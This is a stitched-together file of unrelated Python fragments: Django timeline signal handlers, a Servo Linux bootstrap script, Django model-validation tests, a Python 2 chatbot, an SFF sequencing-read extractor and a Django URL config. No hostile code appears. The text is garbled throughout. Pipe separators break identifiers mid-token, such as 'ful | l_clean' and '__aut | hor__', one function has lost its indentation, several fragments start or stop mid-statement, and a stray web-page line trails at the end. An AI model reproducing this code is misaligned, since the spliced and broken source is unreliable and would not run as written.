    :param extra_data: optional dict with extra payload for the entries.
    """
    # Bug fix: the default was a shared mutable dict ({}); use None as the
    # sentinel so every call gets its own fresh empty dict.
    if extra_data is None:
        extra_data = {}
    if project is not None:
        # Actions related with a project
        ## Project timeline
        _push_to_timeline(project, obj, event_type, created_datetime,
                          namespace=build_project_namespace(project),
                          extra_data=extra_data)
        ## User profile timelines
        ## - Me
        related_people = User.objects.filter(id=user.id)
        ## - Owner
        if hasattr(obj, "owner_id") and obj.owner_id:
            related_people |= User.objects.filter(id=obj.owner_id)
        ## - Assigned to
        if hasattr(obj, "assigned_to_id") and obj.assigned_to_id:
            related_people |= User.objects.filter(id=obj.assigned_to_id)
        ## - Watchers
        watchers = getattr(obj, "watchers", None)
        if watchers:
            related_people |= obj.watchers.all()
        ## - Exclude inactive and system users and remove duplicates
        related_people = related_people.exclude(is_active=False)
        related_people = related_people.exclude(is_system=True)
        related_people = related_people.distinct()
        _push_to_timeline(related_people, obj, event_type, created_datetime,
                          namespace=build_user_namespace(user),
                          extra_data=extra_data)
    else:
        # Actions not related with a project: only the actor's own timeline
        _push_to_timeline(user, obj, event_type, created_datetime,
                          namespace=build_user_namespace(user),
                          extra_data=extra_data)
def _clean_description_fields(values_diff):
    """Strip bulky description payloads from a history values diff, in place."""
    # Description_diff and description_html if included can be huge, we are
    # removing the html one and clearing the diff
    values_diff.pop("description_html", None)
    if "description_diff" in values_diff:
        values_diff["description_diff"] = _("Check the history API for the exact diff")
def on_new_history_entry(sender, instance, created, **kwargs):
    """post-save handler for history entries: mirror them into timelines."""
    if instance._importing:
        # bulk imports must not generate timeline noise
        return
    if instance.is_hidden:
        return None
    model = history_services.get_model_from_key(instance.key)
    pk = history_services.get_pk_from_key(instance.key)
    obj = model.objects.get(pk=pk)
    project = obj.project
    if instance.type == HistoryType.create:
        event_type = "create"
    elif instance.type == HistoryType.change:
        event_type = "change"
    elif instance.type == HistoryType.delete:
        event_type = "delete"
    # NOTE(review): any other HistoryType value leaves event_type unbound and
    # raises NameError below -- confirm the enum has exactly these members.
    user = User.objects.get(id=instance.user["pk"])
    values_diff = instance.values_diff
    _clean_description_fields(values_diff)
    extra_data = {
        "values_diff": values_diff,
        "user": extract_user_info(user),
        "comment": instance.comment,
        "comment_html": instance.comment_html,
    }
    # Detect deleted comment
    if instance.delete_comment_date:
        extra_data["comment_deleted"] = True
    created_datetime = instance.created_at
    _push_to_timelines(project, user, obj, event_type, created_datetime, extra_data=extra_data)
def create_membership_push_to_timeline(sender, instance, **kwargs):
    """
    Creating new membership with associated user. If the user is the project owner we don't
    do anything because that info will be shown in the created-project timeline entry.

    @param sender: Membership model
    @param instance: Membership object
    """
    # New membership with a user who is not the project owner
    if not instance.pk and instance.user and instance.user != instance.project.owner:
        created_datetime = instance.created_at
        _push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
    # Updating existing membership
    elif instance.pk:
        try:
            prev_instance = sender.objects.get(pk=instance.pk)
            if instance.user != prev_instance.user:
                created_datetime = timezone.now()
                # The new member
                _push_to_timelines(instance.project, instance.user, instance, "create", created_datetime)
                # If we are updating, the old user is removed from the project
                if prev_instance.user:
                    _push_to_timelines(instance.project,
                                       prev_instance.user,
                                       prev_instance,
                                       "delete",
                                       created_datetime)
        except sender.DoesNotExist:
            # This happens with some tests, when a membership is created with a concrete id
            pass
def delete_membership_push_to_timeline(sender, instance, **kwargs):
    """Record a "delete" timeline entry when a membership with a user goes away."""
    if not instance.user:
        return
    _push_to_timelines(instance.project, instance.user, instance, "delete", timezone.now())
def create_user_push_to_timeline(sender, instance, created, **kwargs):
    """Record a "create" timeline entry when a brand-new user is saved."""
    if not created:
        return
    # a user's own creation has no project context
    _push_to_timelines(None, instance, instance, "create", created_datetime=instance.date_joined)
|
main"], force)
run_as_root(["apt-get", "update"])
run_as_root(["apt-get", "install", "clang-4.0"], force)
return gcc or clang
def check_gstreamer_lib():
    """Return True when pkg-config reports gstreamer-1.0 at version 1.12+."""
    status = subprocess.call(["pkg-config", "gstreamer-1.0 >= 1.12"],
                             stdout=PIPE, stderr=PIPE)
    return status == 0
def run_as_root(command, force=False):
    """Run *command* (a list of argv items), prefixed with sudo when the
    current process is not already root.

    With force=True, append "-y" so apt-get/dnf do not prompt.
    Returns the subprocess exit status.
    """
    if os.geteuid() != 0:
        command.insert(0, 'sudo')
    if force:
        # bug fix: `command += "-y"` extended the list with the two
        # characters '-' and 'y'; append the flag as a single argument
        command.append("-y")
    return subprocess.call(command)
def install_linux_deps(context, pkgs_ubuntu, pkgs_fedora, force):
    """Install whichever of the given packages are missing on this distro.

    Returns True when an install was attempted, False when everything was
    already present (or the distro is unrecognized).
    """
    install = False
    pkgs = []
    if context.distro == 'Ubuntu':
        command = ['apt-get', 'install']
        pkgs = pkgs_ubuntu
        # dpkg -s exits non-zero if any queried package is not installed
        if subprocess.call(['dpkg', '-s'] + pkgs, stdout=PIPE, stderr=PIPE) != 0:
            install = True
    elif context.distro in ['CentOS', 'CentOS Linux', 'Fedora']:
        # one big "name|name|..." string to substring-test each package against
        installed_pkgs = str(subprocess.check_output(['rpm', '-qa'])).replace('\n', '|')
        pkgs = pkgs_fedora
        for p in pkgs:
            command = ['dnf', 'install']
            if "|{}".format(p) not in installed_pkgs:
                install = True
                break
    if install:
        if force:
            command.append('-y')
        print("Installing missing dependencies...")
        run_as_root(command + pkgs)
        return True
    return False
def install_salt_dependencies(context, force):
    """Ensure the native build dependencies needed by Salt are present."""
    apt_pkgs = ['build-essential', 'libssl-dev', 'libffi-dev', 'python-dev']
    dnf_pkgs = ['gcc', 'libffi-devel', 'python-devel', 'openssl-devel']
    if not install_linux_deps(context, apt_pkgs, dnf_pkgs, force):
        print("Dependencies are already installed")
def gstreamer(context, force=False):
    """Build the bundled gstreamer unless its lib directory already exists.

    Returns True when a build was performed, False when nothing was done.
    """
    gstdir = os.path.join(os.curdir, "support", "linux", "gstreamer")
    if os.path.isdir(os.path.join(gstdir, "gstreamer", "lib")):
        return False
    subprocess.check_call(["bash", "gstreamer.sh"], cwd=gstdir)
    return True
def bootstrap_gstreamer(context, force=False):
    """mach bootstrap-gstreamer entry point; always returns 0."""
    already_done = not gstreamer(context, force)
    if already_done:
        print("gstreamer is already set up")
    return 0
def linux(context, force=False):
    """Install Servo's Linux build dependencies (apt or dnf based distros).

    Returns 0; prints a notice when nothing needed to be installed.
    """
    # Please keep these in sync with the packages in README.md
    pkgs_apt = ['git', 'curl', 'autoconf', 'libx11-dev', 'libfreetype6-dev',
                'libgl1-mesa-dri', 'libglib2.0-dev', 'xorg-dev', 'gperf', 'g++',
                'build-essential', 'cmake', 'python-pip',
                'libbz2-dev', 'libosmesa6-dev', 'libxmu6', 'libxmu-dev', 'libglu1-mesa-dev',
                'libgles2-mesa-dev', 'libegl1-mesa-dev', 'libdbus-1-dev', 'libharfbuzz-dev',
                'ccache', 'clang', 'autoconf2.13']
    pkgs_dnf = ['libtool', 'gcc-c++', 'libXi-devel', 'freetype-devel',
                'mesa-libGL-devel', 'mesa-libEGL-devel', 'glib2-devel', 'libX11-devel',
                'libXrandr-devel', 'gperf', 'fontconfig-devel', 'cabextract', 'ttmkfdir',
                'python2', 'python2-virtualenv', 'python2-pip', 'expat-devel', 'rpm-build',
                'openssl-devel', 'cmake', 'bzip2-devel', 'libXcursor-devel', 'libXmu-devel',
                'mesa-libOSMesa-devel', 'dbus-devel', 'ncurses-devel', 'harfbuzz-devel',
                'ccache', 'mesa-libGLU-devel', 'clang', 'clang-libs', 'gstreamer1-devel',
                'gstreamer1-plugins-base-devel', 'gstreamer1-plugins-bad-free-devel', 'autoconf213']
    if context.distro == "Ubuntu":
        # pick the libssl dev package matching the Ubuntu release
        if context.distro_version == "17.04":
            pkgs_apt += ["libssl-dev"]
        elif int(context.distro_version.split(".")[0]) < 17:
            pkgs_apt += ["libssl-dev"]
        else:
            pkgs_apt += ["libssl1.0-dev"]
        # 14.04 predates the split virtualenv package name
        if context.distro_version == "14.04":
            pkgs_apt += ["python-virtualenv"]
        else:
            pkgs_apt += ["virtualenv"]
        pkgs_apt += ['libgstreamer1.0-dev', 'libgstreamer-plugins-base1.0-dev',
                     'libgstreamer-plugins-bad1.0-dev']
    elif context.distro == "Debian" and context.distro_version == "Sid":
        pkgs_apt += ["libssl-dev"]
    else:
        pkgs_apt += ["libssl1.0-dev"]
    installed_something = install_linux_deps(context, pkgs_apt, pkgs_dnf, force)
    # fall back to the bundled gstreamer when the system one is too old
    if not check_gstreamer_lib():
        installed_something |= gstreamer(context, force)
    if context.distro == "Ubuntu" and context.distro_version == "14.04":
        installed_something |= install_trusty_deps(force)
    if not installed_something:
        print("Dependencies were already installed!")
    return 0
def salt(context, force=False):
# Ensure Salt dependencies are installed
install_salt_dependencies(context, force)
# Ensure Salt is installed in the virtualenv
# It's not instaled globally because it's a large, non-required dependency,
# and the installation fails on Windows
print("Checking Salt installation...", end='')
reqs_path = os.path.join(context.topdir, 'python', 'requirements-salt.txt')
process = subprocess.Popen(
["pip", "install", "-q", "-I", "-r", reqs_path],
stdout=PIPE,
stderr=PIPE
)
process.wait()
if process.returncode:
out, err = process.communicate()
print('failed to install Salt via pip:')
print('Output: {}\nError: {}'.format(out, err))
return 1
print("done")
salt_root = os.path.join(context.sharedir, 'salt')
config_dir = os.path.join(salt_root, 'etc', 'salt')
pillar_dir = os.path.join(config_dir, 'pillars')
# In order to allow `mach bootstrap` to work from any CWD,
# the `root_dir` must be an absolute path.
# We place it under `context.sharedir` because
# Salt caches data (e.g. gitfs files) in its `var` subdirectory.
# Hence, dynamically generate the config with an appropriate `root_dir`
# and serialize it as JSON (which is valid YAML).
config = {
'hash_type': 'sha384',
'master': 'localhost',
'root_dir': salt_root,
'state_output': 'changes',
'state_tabular': True,
}
if 'SERVO_SALTFS_ROOT' in os.environ:
config.update({
'fileserver_backend': ['roots'],
'file_roots': {
'base': [os.path.abspath(os.environ['SERVO_SALTFS_ROOT'])],
},
})
else:
config.update({
'fileserver_backend': ['git'],
'gitfs_env_whitelist': 'base',
'gitfs_provider': 'gitpython',
'gitfs_remotes': [
'https://github.com/servo/saltfs.git',
],
})
if not os.path.exists(config_dir):
os.makedirs(config_dir, mode=0o700)
with open(os.path.join(config_dir, 'minion'), 'w') as config_file:
config_file.write(json.dumps(config) + '\n')
# Similarly, the pillar data is created dynamically
# and temporarily serialized to disk.
# This dynamism is not yet used, but will be in the future
# to enable Android bootstrapping by using
# context.sharedir as a location for Android packages.
pillar = {
'top.sls': {
'base': {
'*': ['bootstrap'],
},
},
'bootstrap.sls': {
'fully_managed': False,
},
}
if os.path.exists(pillar_dir):
shutil.rmtree(pillar_dir)
os.makedirs(pillar_dir, mode=0o700)
for filename in pillar:
with open(os.path.join(pillar_dir, filename), 'w') as pillar_file:
pillar_file.write(json.dumps(pillar[filename]) + '\n')
cmd = [
# sudo escapes from the venv, need to use full path
find_executable('salt-call'),
'--local',
'--config-dir={}'.format(config_dir),
'--pillar-root={}'.format(pillar_dir),
'state.apply',
'servo-build-dependencies',
]
if not force:
print('Running bootstrap in dry-run mode to show changes')
# Because `test=True` mode runs each state individually without
# considering how required/previous states affect the system,
# it will often report states with requisites as failing due
# to the requisites not actually being run,
# even though these are spurious and will succeed during
# the actual |
from django import forms
from django.test import TestCase
from django.core.exceptions import NON_FIELD_ERRORS
from modeltests.validation import ValidationTestCase
from modeltests.validation.models import Author, Article, ModelToValidate
# Import other tests for this package.
from modeltests.validation.validators import TestModelsWithValidators
from modeltests.validation.test_unique import (GetUniqueCheckTests,
PerformUniqueChecksTest)
from modeltests.validation.test_custom_messages import CustomMessagesTest
class BaseModelValidationTests(ValidationTestCase):
def test_missing_required_field_raises_error(self):
mtv = ModelToValidate(f_with_custom_validator=42)
self.assertFailsValidation(mtv.full_clean, ['name', 'number'])
def test_with_correct_value_model_validates(self):
mtv = ModelToValidate(number=10, name='Some Name')
self.assertEqual(None, mtv.full_clean())
def test_custom_validate_method(self):
mtv = ModelToValidate(number=11)
self.assertFailsValidation(mtv.full_clean, [NON_FIELD_ERRORS, 'name'])
def test_wrong_FK_value_raises_error(self):
mtv=ModelToValidate(number=10, name='Some Name', parent_id=3)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_correct_FK_value_validates(self):
parent = ModelToValidate.objects.create(number=10, name='Some Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertEqual(None, mtv.full_clean())
def test_limited_FK_raises_error(self):
# The limit_choices_to on the parent field says that a parent object's
# number attribute must be 10, so this should fail validation.
parent = ModelToValidate.objects.create(number=11, name='Other Name')
mtv = ModelToValidate(number=10, name='Some Name', parent_id=parent.pk)
self.assertFailsValidation(mtv.full_clean, ['parent'])
def test_wrong_email_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', email='not-an-email')
self.assertFailsValidation(mtv.full_clean, ['email'])
def test_correct_email_value_passes(self):
mtv = ModelToValidate(number=10, name='Some Name', email='valid@email.com')
self.assertEqual(None, mtv.full_clean())
def test_wrong_url_value_raises_error(self):
mtv = ModelToValidate(number=10, name='Some Name', url='not a url')
self.assertFieldFailsValidationWithMessage(mtv.full_clean, 'url', [u'Enter a valid value.'])
def test_correct_url_but_nonexisting_gives_404(self):
mtv = ModelToValidate(number=10, name='Some Name', url='http://google.com/we-love-microsoft.html')
self.assertFieldFailsValidationWithMessage(mtv.ful | l_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_url_value_passes(self):
    """A reachable URL validates cleanly (needs Internet access)."""
    obj = ModelToValidate(number=10, name='Some Name', url='http://www.djangoproject.com/')
    self.assertEqual(None, obj.full_clean())  # This will fail if there's no Internet connection
def test_correct_https_url_but_nonexisting(self):
    """HTTPS URLs that cannot be verified are reported as broken links."""
    obj = ModelToValidate(number=10, name='Some Name', url='https://www.djangoproject.com/')
    self.assertFieldFailsValidationWithMessage(obj.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftp_url_but_nonexisting(self):
    """FTP URLs that cannot be verified are reported as broken links."""
    obj = ModelToValidate(number=10, name='Some Name', url='ftp://ftp.google.com/we-love-microsoft.html')
    self.assertFieldFailsValidationWithMessage(obj.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_correct_ftps_url_but_nonexisting(self):
    """FTPS URLs that cannot be verified are reported as broken links."""
    obj = ModelToValidate(number=10, name='Some Name', url='ftps://ftp.google.com/we-love-microsoft.html')
    self.assertFieldFailsValidationWithMessage(obj.full_clean, 'url', [u'This URL appears to be a broken link.'])
def test_text_greater_that_charfields_max_length_raises_erros(self):
    """A name far beyond the CharField max_length fails validation."""
    obj = ModelToValidate(number=10, name='Some Name'*100)
    self.assertFailsValidation(obj.full_clean, ['name',])
class ArticleForm(forms.ModelForm):
    """ModelForm for Article; 'author' is excluded and must be set by the caller."""
    class Meta:
        model = Article
        exclude = ['author']
class ModelFormsTests(TestCase):
    """Model validation must cooperate with the ModelForm machinery."""

    def setUp(self):
        self.author = Author.objects.create(name='Joseph Kocherhans')

    def test_partial_validation(self):
        """The "commit=False, set fields later" idiom still validates."""
        form_data = {
            'title': 'The state of model validation',
            'pub_date': '2010-1-10 14:49:00'
        }
        form = ArticleForm(form_data)
        self.assertEqual(form.errors.keys(), [])
        pending = form.save(commit=False)
        pending.author = self.author
        pending.save()

    def test_validation_with_empty_blank_field(self):
        """A missing blank=True pub_date is filled by Article.clean().

        Article.clean() runs during validation and populates pub_date,
        so the form saves cleanly even though the column is NOT NULL.
        """
        form_data = {
            'title': 'The state of model validation',
        }
        target = Article(author_id=self.author.id)
        form = ArticleForm(form_data, instance=target)
        self.assertEqual(form.errors.keys(), [])
        self.assertNotEqual(form.instance.pub_date, None)
        target = form.save()

    def test_validation_with_invalid_blank_field(self):
        """An unparsable pub_date is rejected despite blank=True."""
        form_data = {
            'title': 'The state of model validation',
            'pub_date': 'never'
        }
        target = Article(author_id=self.author.id)
        form = ArticleForm(form_data, instance=target)
        self.assertEqual(form.errors.keys(), ['pub_date'])
|
# Standard-library imports plus the bot's own generated/learned modules.
import os
import sys as sys
# Launch the engage helper before anything else is imported.
# NOTE(review): this shells out at import time and assumes the CWD is
# the project root -- confirm that is intended.
os.system("python bot/bot.py engage")
import bot_response as bot  # auto-generated command/response module (see writeCommand)
import bot_learn as learner
def hasUserSwore(message):
    """Return True if `message` contains a known swear word.

    Matching is case-insensitive, so variants such as "FUCK" or
    "BiTcH" are caught too -- the original four-branch chain only
    matched the all-lowercase and Capitalized spellings.
    """
    lowered = message.lower()
    return any(word in lowered for word in ("fuck", "bitch"))
#Allow the user to communicate with the bot
#Also allow the bot to learn about the person
def toBot():
    # Interactive loop (implemented via tail recursion at the bottom):
    # read one message, handle administrative commands inline, and hand
    # the text to bot.getResponse().
    if(os.path.isfile(".bot_engage")):
        # A lock file marks an already-running instance.
        print "You can only run one instance of Clarissa."
    else:
        swearNum = 1  # NOTE(review): assigned but never read in this function
        messageToBot = raw_input("Message: ")
        if(messageToBot == "--add-command"):
            # Append a new elif branch to the generated bot_response.py
            # and reload it so the new command takes effect immediately.
            writeCommand(command=raw_input("Command: "), response=raw_input("Responses: "))
            reload(bot)
        elif(messageToBot == "kill-bot"):
            exit()
        elif(messageToBot == "--clear-commands"):
            #os.remove("commands.bot")
            #os.remove("responses.bot")
            # Drop the generated module and re-seed it with a greeting.
            os.remove("bot_response.py")
            writeCommand("Hello", "Hi")
            print "Cleared commands"
        elif(messageToBot == "learn"):
            learner.learn(db_support=False)
        elif(messageToBot == "--get-commands"):
            commandsList = open("commands.list","r")
            print commandsList.read()
        # Every message (administrative or not) is also sent to the bot.
        bot.getResponse(messageToBot)
        toBot()  # recurse to read the next message
def writeCommand(command, response):
    """Append a command/response branch to bot_response.py and record the name.

    The generated branch is a Python 2 `elif`/`print` pair matching the
    style of the rest of bot_response.py.  The command name is written
    to commands.list (overwriting any previous contents, as before).
    """
    with open("bot_response.py", "a") as generated:
        generated.write("\n\telif(messageToBot == \"" + command + "\"):")
        generated.write("\n\t\tprint \"Clarissa: " + response + "\"")
    with open("commands.list", "w") as listing:
        listing.write(command)
def getIf(message, command, response):
    """Print the bot's reply when `message` equals `command`, else complain."""
    if message != command:
        print("I do not understand " + message)
    else:
        print("Clarissa: " + response)
def getCommands():
    """Return the raw text of the commands.bot file."""
    with open("commands.bot", "r") as fhand:
        return fhand.read()
def getResponses():
    """Return the raw text of the responses.bot file."""
    with open("responses.bot", "r") as fhand:
        return fhand.read()
# Module entry point: dispatch on the first command-line argument; with
# no argument at all, fall straight into interactive mode.
swearNum = 0  # NOTE(review): never read again in this file -- dead state?
try:
    if(sys.argv[1] == "--add-command"):
        # Register a command/response pair from argv and reload the
        # generated module so it takes effect in this process.
        writeCommand(command=sys.argv[2], response=sys.argv[3])
        reload(bot)
    elif (sys.argv[1] == "--clear-commands"):
        #os.remove("commands.bot")
        #os.remove("responses.bot")
        # Drop the generated module and re-seed it with a greeting.
        os.remove("bot_response.py")
        writeCommand("Hello", "Hi")
        print "Cleared commands"
    elif (sys.argv[1] == "learn"):
        learner.learn(db_support=False)
    elif (sys.argv[1] == "--get-commands"):
        commandsList = open("commands.list","r")
        print commandsList.read()
    else:
        toBot()
except IndexError:
    # No CLI argument supplied: interactive mode.
    toBot()
|
__aut | hor__ | = 'thuy'
|
# Copyright 2012 Jose Blanca, | Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; withou | t even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
    """Yield SeqRecords from an SFF file enforcing a minimum left clip.

    sff_fhand -- an open SFF file handle.
    trim -- if True the clipped prefix is physically removed; otherwise
        the clip annotations are updated and the clipped prefix is
        marked in lowercase (SFF convention).
    min_left_clip -- smallest number of bases to clip on the left,
        regardless of the quality/adapter clips stored in the file.
    """
    for record in SffIterator(sff_fhand, trim=False):
        annots = record.annotations
        clip_qual = annots['clip_qual_left']
        clip_adapt = annots['clip_adapter_left']
        # Effective clip: the rightmost of the file's quality clip, the
        # file's adapter clip, and the caller-imposed minimum.
        clip = max(min_left_clip, clip_qual, clip_adapt)
        seq = record.seq
        if trim:
            record.annotations = {}
            record = record[clip:]
        else:
            annots['clip_qual_left'] = clip
            annots['clip_adapter_left'] = clip
            # Lowercase the clipped prefix, uppercase the kept suffix.
            seq = seq[:clip].lower() + seq[clip:].upper()
            quals = record.letter_annotations['phred_quality']
            # letter_annotations must be emptied before .seq can be
            # replaced (Biopython enforces matching lengths).
            record.letter_annotations = {}
            record.seq = seq
            # HACK: restore the qualities through the private dict to
            # bypass Biopython's length/consistency checks.
            dict.__setitem__(record._per_letter_annotations,
                             "phred_quality", quals)
        yield record
class SffExtractor(object):
    'This class extracts the reads from an SFF file'

    def __init__(self, sff_fhands, trim=False, min_left_clip=0,
                 nucls_to_check=50, max_nucl_freq_threshold=0.5):
        """It inits the class.

        sff_fhands -- sequence of open SFF file handles.
        trim -- physically remove the left clip instead of annotating it.
        min_left_clip -- minimum left clip to enforce on every read.
        nucls_to_check -- number of leading positions to profile for
            suspiciously uniform nucleotide composition.
        max_nucl_freq_threshold -- per-position frequency above which a
            nucleotide is considered suspiciously dominant.
        """
        self.fhands = sff_fhands
        self.trim = trim
        self.min_left_clip = min_left_clip
        # checking
        self.nucls_to_check = nucls_to_check
        self.max_nucl_freq_threshold = max_nucl_freq_threshold
        # per-file {fpath: {nucl: array of per-position counts}}
        self.nucl_counts = {}

    @property
    def seqs(self):
        """It yields all sequences, updating per-file nucleotide counts."""
        for fhand in self.fhands:
            self._prepare_nucl_counts(fhand.name)
            if not self.min_left_clip:
                seqs = SffIterator(fhand, trim=self.trim)
            else:
                # Enforce the extra left clip on top of the file's own.
                seqs = _min_left_clipped_seqs(fhand, self.trim,
                                              self.min_left_clip)
            for record in seqs:
                self._update_nucl_counts(str(record.seq), fhand.name)
                yield record

    def _prepare_nucl_counts(self, fpath):
        'It prepares the structure to store the nucleotide counts'
        # One unsigned-long counter per leading position and nucleotide.
        counts = {'A': array('L', [0] * self.nucls_to_check),
                  'T': array('L', [0] * self.nucls_to_check),
                  'C': array('L', [0] * self.nucls_to_check),
                  'G': array('L', [0] * self.nucls_to_check)}
        self.nucl_counts[fpath] = counts

    def _update_nucl_counts(self, seq, fpath):
        'Given a seq (as a string) it updates the nucleotide counts'
        seq = seq[:self.nucls_to_check]
        counts = self.nucl_counts
        for index, nucl in enumerate(seq):
            try:
                counts[fpath][nucl][index] += 1
            except KeyError:
                pass    # we do not count the lowercase (clipped) letters

    @property
    def clip_advice(self):
        """It checks how many positions have a high max nucl freq.

        Returns {fpath: advice} where advice is None when nothing is
        suspicious, or (positions_to_clip, dominant_sequence) when the
        leading positions look like an unremoved adapter.
        """
        advices = {}
        for fhand in self.fhands:
            fpath = fhand.name
            counts = self.nucl_counts[fpath]
            treshold = self.max_nucl_freq_threshold
            pos_above_threshold = 0
            seq_above_threshold = ''
            index = 0
            for index in range(self.nucls_to_check):
                num_nucls = [counts['A'][index], counts['T'][index],
                             counts['C'][index], counts['G'][index]]
                tot_nucls = sum(num_nucls)
                if not tot_nucls:
                    # Position never observed (all reads shorter/clipped).
                    continue
                freq_nucls = [i / tot_nucls for i in num_nucls]
                above_threshold = [i >= treshold for i in freq_nucls]
                if any(above_threshold):
                    pos_above_threshold += 1
                    seq_above_threshold += _get_nucl_with_max_freq('ATCG',
                                                                   freq_nucls)
                else:
                    # First balanced position: stop scanning this file.
                    break
            # NOTE(review): the advice uses `index` (where the loop
            # stopped), not pos_above_threshold; if every checked
            # position is dominant the loop ends without break and
            # index is nucls_to_check - 1 -- confirm this off-by-one is
            # intended.
            if pos_above_threshold:
                if self.trim:
                    # number of nucleotides to remove next time, the ones
                    # that we have detected plus the ones already removed
                    advice = index + self.min_left_clip, seq_above_threshold
                else:
                    advice = index, seq_above_threshold
            else:
                advice = None
            advices[fpath] = advice
        return advices
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
xml += '\t\t<clip_quality_rigth>{}</clip_quality_rigth>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
xml += '\t\t<clip_vector_rigth>{}</clip_vector_rigth>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
    """Yield the given seqs unchanged while writing a traceinfo XML file.

    The closing tag is only written once the generator is exhausted, so
    the caller must consume every item for the XML to be complete.
    """
    write = fhand.write
    write('<?xml version="1.0"?>\n<trace_volume>\n')
    for record in seqs:
        write(_do_seq_xml(record))
        yield record
    write('</trace_volume>\n')
    fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmite | m/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteView.as_view(), name='f | mitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.